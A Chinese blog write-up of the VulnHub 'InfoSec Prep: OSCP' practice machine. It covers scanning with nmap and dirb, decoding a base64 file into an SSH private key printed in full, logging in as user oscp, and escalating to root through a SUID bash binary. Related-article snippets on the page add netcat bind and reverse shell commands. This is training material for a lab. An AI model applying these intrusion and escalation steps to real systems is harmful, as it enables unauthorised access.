Vulnhub-OSCP靶机实战

最新推荐文章于 2024-02-03 20:38:11 发布
最新推荐文章于 2024-02-03 20:38:11 发布
阅读量2.2k 收藏 14
点赞数 1
分类专栏: 渗透测试 文章标签: 安全 web安全 linux
本文链接:https://blog.csdn.net/kengkeng123qwe/article/details/124688026
版权

前言

这个靶机适合新手,因为步骤很短很短

靶机下载地址:https://www.vulnhub.com/entry/infosec-prep-oscp,508/

KALI地址:192.168.241.108

靶机地址:192.168.241.170

一.信息收集

1.主机发现

使用命令如下

netdiscover -r 192.168.241.108

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JqjoBOO2-1652164667469)(/images/wordimage/2022/0510/net.png)]

2.主机扫描

既然发现了主机,那么就需要进行信息收集,和扫描,这里使用Nmap工具,命令如下。

nmap -A -T4 -p- 192.168.241.170

如下图,发现开放的端口有20,80,33060

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GuwRqVwy-1652164667470)(/images/wordimage/2022/0510/nmap.png)]

3.目录扫描

既然发现开放了80端口,开放了http服务肯定是,有目录,使用命令如下。

dirb http://192.168.241.170

如下图,发现扫描了很多东西,比如wordpress,和robots.txt目录

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dVPNR2fB-1652164667471)(/images/wordimage/2022/0510/dirb.png)]

4.网页信息收集

如下图,我们访问首页,发现任务目标,发现是需要获取/root目录下面的东西,然后指定用户是oscp

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pv4fmIlJ-1652164667471)(/images/wordimage/2022/0510/inter.png)]

并且得知,web目录是wordpress目录,然后我们上面目录扫描,发现了robots.txt,如下图访问,发现有一个目录是/secert.txt目录

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-obF7s2XN-1652164667472)(/images/wordimage/2022/0510/robots.png)]

如下图访问这个目录,发现是一堆的编码,看后面两个==可以发现是base64编码。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SvRKg3Jv-1652164667473)(/images/wordimage/2022/0510/secert.png)]

二.漏洞利用

上面我们发现了base64编码,我们拿去网上base64解密,解密结果如下。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4zbDFUx8-1652164667473)(/images/wordimage/2022/0510/base64.png)]

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAtHCsSzHtUF8K8tiOqECQYLrKKrCRsbvq6iIG7R9g0WPv9w+gkUWe
IzBScvglLE9flolsKdxfMQQbMVGqSADnYBTavaigQekue0bLsYk/rZ5FhOURZLTvdlJWxz
bIeyC5a5F0Dl9UYmzChe43z0Do0iQw178GJUQaqscLmEatqIiT/2FkF+AveW3hqPfbrw9v
A9QAIUA3ledqr8XEzY//Lq0+sQg/pUu0KPkY18i6vnfiYHGkyW1SgryPh5x9BGTk3eRYcN
w6mDbAjXKKCHGM+dnnGNgvAkqT+gZWz/Mpy0ekauk6NP7NCzORNrIXAYFa1rWzaEtypHwY
kCEcfWJJlZ7+fcEFa5B7gEwt/aKdFRXPQwinFliQMYMmau8PZbPiBIrxtIYXy3MHcKBIsJ
0HSKv+HbKW9kpTL5OoAkB8fHF30ujVOb6YTuc1sJKWRHIZY3qe08I2RXeExFFYu9oLug0d
tHYdJHFL7cWiNv4mRyJ9RcrhVL1V3CazNZKKwraRAAAFgH9JQL1/SUC9AAAAB3NzaC1yc2
EAAAGBALRwrEsx7VBfCvLYjqhAkGC6yiqwkbG76uoiBu0fYNFj7/cPoJFFniMwUnL4JSxP
X5aJbCncXzEEGzFRqkgA52AU2r2ooEHpLntGy7GJP62eRYTlEWS073ZSVsc2yHsguWuRdA
5fVGJswoXuN89A6NIkMNe/BiVEGqrHC5hGraiIk/9hZBfgL3lt4aj3268PbwPUACFAN5Xn
aq/FxM2P/y6tPrEIP6VLtCj5GNfIur534mBxpMltUoK8j4ecfQRk5N3kWHDcOpg2wI1yig
hxjPnZ5xjYLwJKk/oGVs/zKctHpGrpOjT+zQszkTayFwGBWta1s2hLcqR8GJAhHH1iSZWe
/n3BBWuQe4BMLf2inRUVz0MIpxZYkDGDJmrvD2Wz4gSK8bSGF8tzB3CgSLCdB0ir/h2ylv
ZKUy+TqAJAfHxxd9Lo1Tm+mE7nNbCSlkRyGWN6ntPCNkV3hMRRWLvaC7oNHbR2HSRxS+3F
ojb+JkcifUXK4VS9VdwmszWSisK2kQAAAAMBAAEAAAGBALCyzeZtJApaqGwb6ceWQkyXXr
bjZil47pkNbV70JWmnxixY31KjrDKldXgkzLJRoDfYp1Vu+sETVlW7tVcBm5MZmQO1iApD
gUMzlvFqiDNLFKUJdTj7fqyOAXDgkv8QksNmExKoBAjGnM9u8rRAyj5PNo1wAWKpCLxIY3
BhdlneNaAXDV/cKGFvW1aOMlGCeaJ0DxSAwG5Jys4Ki6kJ5EkfWo8elsUWF30wQkW9yjIP
UF5Fq6udJPnmEWApvLt62IeTvFqg+tPtGnVPleO3lvnCBBIxf8vBk8WtoJVJdJt3hO8c4j
kMtXsvLgRlve1bZUZX5MymHalN/LA1IsoC4Ykg/pMg3s9cYRRkm+GxiUU5bv9ezwM4Bmko
QPvyUcye28zwkO6tgVMZx4osrIoN9WtDUUdbdmD2UBZ2n3CZMkOV9XJxeju51kH1fs8q39
QXfxdNhBb3Yr2RjCFULDxhwDSIHzG7gfJEDaWYcOkNkIaHHgaV7kxzypYcqLrs0S7C4QAA
AMEAhdmD7Qu5trtBF3mgfcdqpZOq6+tW6hkmR0hZNX5Z6fnedUx//QY5swKAEvgNCKK8Sm
iFXlYfgH6K/5UnZngEbjMQMTdOOlkbrgpMYih+ZgyvK1LoOTyMvVgT5LMgjJGsaQ5393M2
yUEiSXer7q90N6VHYXDJhUWX2V3QMcCqptSCS1bSqvkmNvhQXMAaAS8AJw19qXWXim15Sp
WoqdjoSWEJxKeFTwUW7WOiYC2Fv5ds3cYOR8RorbmGnzdiZgxZAAAAwQDhNXKmS0oVMdDy
3fKZgTuwr8My5Hyl5jra6owj/5rJMUX6sjZEigZa96EjcevZJyGTF2uV77AQ2Rqwnbb2Gl
jdLkc0Yt9ubqSikd5f8AkZlZBsCIrvuDQZCoxZBGuD2DUWzOgKMlfxvFBNQF+LWFgtbrSP
OgB4ihdPC1+6FdSjQJ77f1bNGHmn0amoiuJjlUOOPL1cIPzt0hzERLj2qv9DUelTOUranO
cUWrPgrzVGT+QvkkjGJFX+r8tGWCAOQRUAAADBAM0cRhDowOFx50HkE+HMIJ2jQIefvwpm
Bn2FN6kw4GLZiVcqUT6aY68njLihtDpeeSzopSjyKh10bNwRS0DAILscWg6xc/R8yueAeI
Rcw85udkhNVWperg4OsiFZMpwKqcMlt8i6lVmoUBjRtBD4g5MYWRANO0Nj9VWMTbW9RLiR
kuoRiShh6uCjGCCH/WfwCof9enCej4HEj5EPj8nZ0cMNvoARq7VnCNGTPamcXBrfIwxcVT
8nfK2oDc6LfrDmjQAAAAlvc2NwQG9zY3A=
-----END OPENSSH PRIVATE KEY-----

其实看这个样子就应该知道是ssh连接的密钥,结合上面获取到的用户是oscp,所以我们来进行ssh连接,首先在kali里面创建一个id_rsa的文件,然后把解密出来的东西复制进去,然后给文件赋值权限,这里我赋值的是777的权限,如下图操作

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-S1YyB1mn-1652164667474)(/images/wordimage/2022/0510/idrsa.png)]

然后我们在使用ssh命令连接,命令如下

ssh -i id_rsa oscp@192.168.241.170

发现连接失败,说的是777权限不行,那么我们重新赋值为600权限。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PSY7TWCR-1652164667475)(/images/wordimage/2022/0510/baocuossh.png)]

如下图,连接成功!!

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FAVpYN2G-1652164667476)(/images/wordimage/2022/0510/sshsucc.png)]

三.提权

我们先来三问分别是id,pwd,whoami,如下图,发现就是普通用户

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6zDgA7fO-1652164667477)(/images/wordimage/2022/0510/userid.png)]

经过资料查找,需要用到一种叫做SUID的提权,如果想知道什么是SUID提权可以看看这个文章👉SUID提权

这里我们使用命令来查找,系统上面运行的所有SUID可执行文件,如下命令

find / -perm -u=s -type f 2>/dev/null

而真正能使用提权的,有下面这些👇。

nmap
vim
find
bash
more
less
nano
cp
awk

如下图,这里选择的是bash。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Y7qECZ7t-1652164667477)(/images/wordimage/2022/0510/bash.png)]

使用如下命令来进行成功提权。

/usr/bin/bash -p

如下图,成功提权到root,然后查看flag。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LyPhQ6f1-1652164667478)(/images/wordimage/2022/0510/binbash.png)]

四.总结

核心是SUID提权

御七彩虹猫
关注
  • 1
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hack-the-Box-OSCP-Preparation:Hack-the-Box-OSCP-Preparation
03-20
介绍 你好呀!如果您不认识我,我叫Rana Khalil,然后按Twitter句柄 。在花了将近八个月的时间,攻读了Offensive Security Certified Professional(OSCP)认证后,我很高兴地宣布我已获得OSCP官方认证! 我准备的主要资源是下图所示的。当我浏览机器时,我写了关于如何解决上每个盒子的文章/博客。我最初开始写博客是为了确认我对所遇到的概念的理解。俗话说: “如果不能简单地解释它,那么您就不能充分理解它”。要说那是博客的唯一好处就是轻描淡写。这些文章还可以作为在OSCP考试之前复习我的知识的一种方式,以及在考试期间轻松搜索命令/概念的一种方式。令人惊讶的是,像我这样准备进行OSCP考试的许多人正在阅读我的博客。在过去的五个月中,我的中型博客每月平均浏览量超过21,000次! 通过OSCP考试后,我收到了无数的请求,出于种种我不想在这里介绍的原
java红酒网站源码-OSCP:OSCP
06-05
java网站源码这是一个克隆 这也可以查看 OSCP-生存指南 注意:本文档将目标 ip 称为导出变量 $ip。 要在命令行上设置此值,请使用以下语法: 出口ip=192.168.1.100 目录 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH环境变量中搜索目录which sbd 查找名称中包含特定字符串的文件的搜索: find / -name sbd\* 显示活动的互联网连接netstat -lntp 更改密码passwd 验证服务正在运行和侦听netstat -antp |grep apache 启动服务systemctl start ssh systemctl start apache2 在启动时启动服务systemctl enable ssh 停止服务systemctl stop ssh 解压一个gz文件gunzip access.log.gz 解压 tar.gz 文件tar -xzvf file.tar.gz 搜索命令历史history | grep phrase_
javasnmp源码-Go-For-OSCP:通向OSCP
06-04
java snmp源码通向OSCP 我想分享一些我认为帮助我准备进攻性安全认证专家 - OSCP 认证的事情,以及我在实验室和考试中发现的有用信息。 如果您有任何问题,请随时与我联系。 不要忘记: 首先学习课件,然后开始在实验室中练习。 使用其他来源了解更多信息。 加入进攻性安全 PWK 论坛和社交媒体并与其他人交谈。 尖端 在每次重新启动时启用服务: update-rc.d <[SERVICE]> enable 从 html 页面中提取链接: cat index.html | grep "href=" | cut -d "/" -f3| grep "<[DOMAIN]>" | cut -d '"' -f1 | sort -u 网猫 与应用程序交互: nc -nv <[IP]> <[PORT]> 听众: nc -nlvp <[PORT]> 文件传输(客户端): nc -nlvp <[PORT]> > <[FILE]> 文件传输(服务器): nc -nv <[IP]> <[PORT]> < <[FILE_TO_SEND]> 绑定与反向外壳 绑定外壳: 鲍勃需要爱丽丝的帮助。 Bob 使用
1-OSCP自学笔记-October靶机练习1
08-04
0、前言本教程为《OSCP自学笔记-靶机练习》系列之一的《October靶机练习》,在这个系列中笔者将抽取10台典型靶机作为练习目标,以OSCP学习及考试的角度
vulnhub靶场oscp渗透
weixin_52529261的博客
06-21 461
vulnhub打靶day2
# 【oscp系列】靶机1
weixin_44807430的博客
01-15 778
快速打通靶机
【oscp系列-Lampiaos】靶机2
weixin_44807430的博客
01-16 236
日拱一卒
OSCP-vulnhub:HACKLAB: VULNIX靶机实战
cjstang的博客
07-06 388
本期是OSCP练习中的一个靶场,此靶场涉及到VRFY、hydra、showmount、rsa密钥登录(坑有点大)
oscp靶机教程
weixin_68723119的博客
08-13 288
1.使用命令 arp-scan -l 列出当前局域网的所有设备,在oscp的网络适配器查看到的mac地址和扫描出来的192.168.211.141的MAC地址一致。先找一下有哪些我们可以利用的了,目前我们的用户是普通用户可以通过find命令找找一些特权命令,借助它可以从普通用户提升为root。找网站使用base64对内容进行解密,好家伙,是ssh连接私钥,找到宝了。只有一个用户“oscp”,要么它就是root,要么就是它是唯二用户。看到了bash,很亲切,去gtfobin搜索一下提权方法。
靶机实战(9):OSCP备考之VulnHub BTRSys v2.1
OneMoreThink
01-06 950
靶机官网:BTRSys: v2.1[1]实战思路:一、主机发现二、端口发现(服务、组件、版本)三、漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞22端口/SSH服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞(目录、文件)四、提升权限www-data用户sudosuidcron内核提权信息收集btrisk用户sudo一、主机发现本次攻击指定IP,不涉及主机发现过程。二、端口发...
靶场实战(19):OSCP备考之VulnHub HA WORDY
OneMoreThink
01-19 983
交流技术可以关注公众号 OneMoreThink 或后台添加微信,欢迎提出宝贵建议。0、总结0.1、攻击思路资产发现主机发现服务发现漏洞发现(获取权限)80端口/HTTP服务组件漏洞URL漏洞:RFI、FileUpload提升权限www-data用户sudosuid:wget、cp0.2、攻击路径获取权限80 端口/HTTP 服务WordPress 插件 mail-masta 1.0,存在 RFI...
OSCP靶机----OnSystemShellDredd
qq_53003652的博客
09-13 186
WEB到内网&&FTP匿名&&SSH密钥登录&&SUID提权
靶场实战(6):OSCP备考之VulnHub SolidState
OneMoreThink
01-03 920
靶场官网:SolidState: 1[1]实战思路:主机发现 1端口发现(服务、组件、版本) 1漏洞发现(获取权限) 222端口/SSH服务 2组件漏洞 2口令漏洞 325端口/SMTP服务 4组件漏洞 4口令漏洞 44555端口/James-Admin服务 4组件漏洞 4口令漏洞 8110端口/POP3服务 9组件漏洞 9口令漏洞 980端口/HTTP服务 12组件漏洞 12URL漏洞(目录、文...
vulnhub——oscp靶机
Re1_zf的博客
10-21 923
即使用这些命令从/目录中查找具有SUID权限位且属主为root的文件并将其输出,然后将所有错误重定向到/dev/null,使用find / -user root -perm -4000 -print 2>/dev/null。相比来说,我比较喜欢直接使用nmap对C段进行扫描,直接就把相关信息也扫描出来了,比较方便。前提是知道靶机跟自己在同一C段,这里用的是虚拟机NAT模式,所以可以知道必然在同一C段下。这里其实省了目录扫描的工作了已经,脚本检测发现80端口下有一个secret.txt文件。
文件上传漏洞靶场-OSCP系列靶场过程
zkaqlaoniao的博客
10-08 381
当没有思路的时候,可以上传pspy64来尝试发现root下运行的进程没看够~?欢迎关注!
vulhub靶场学习日记infosecprep-oscp
m0_55763479的博客
08-24 398
vulhub靶场学习日记infosecprep-oscp
实战打靶集锦-023-oscp
最新发布
阿尔泰野狼的博客
02-03 865
接下来searchsploit搜索一下WordPress 5.4.2版本有没有合适的EXP,遗憾的是没有合适的,基本都是跟插件有关的漏洞,而且我们目前通过wpscan扫描结果中是不含插件的。嗯,这说明靶机禁用了密码登录,看来只有通过密钥登录,跟我们的猜测有些不谋而合啊,试试吧。哈,还真是,base64解码以后,更像是一个密钥了,并且开头结尾明确写了,openssh私钥,这下应该妥了。看来我们考虑的是对的,这个不太可能是root的私约,我们仔细看看站点,登录的用户名可能是谁。下面是XML-RPC服务的情况。
渗透测试part(三):Vulhub配置及打靶(以Drupal CVE-2018-7600为例)
m0_56592545的博客
06-25 1062
本系列总共分成了三个部分,在第一部分中对渗透测试进行了简要的概述,第二部分通过VMware搭建了Vulnhub的一个靶机,第三部分则在Ubuntu操作系统中基于Vulhub搭建了一个靶机并借助kali的Metasploit工具快速完成了对Drupal的渗透。t=N5K3t=N5K3t=N5K3t=N5K3t=N5K3打靶-vulhub靶场-drupal-CVE-2018-7600_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1Tv4y1C7GC/?
OSCP-vulnhub:GitRoot靶机实战
cjstang的博客
07-03 1734
OSCP5-vulnhub:GitRoot靶机实战,主要利用方式:hydra 密码破解+git show 反弹shell获取平行账号权限+git 命令提权,此靶场稍微有点困难,需要知晓git等若干使用方法及利用方式,踏坑无数。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值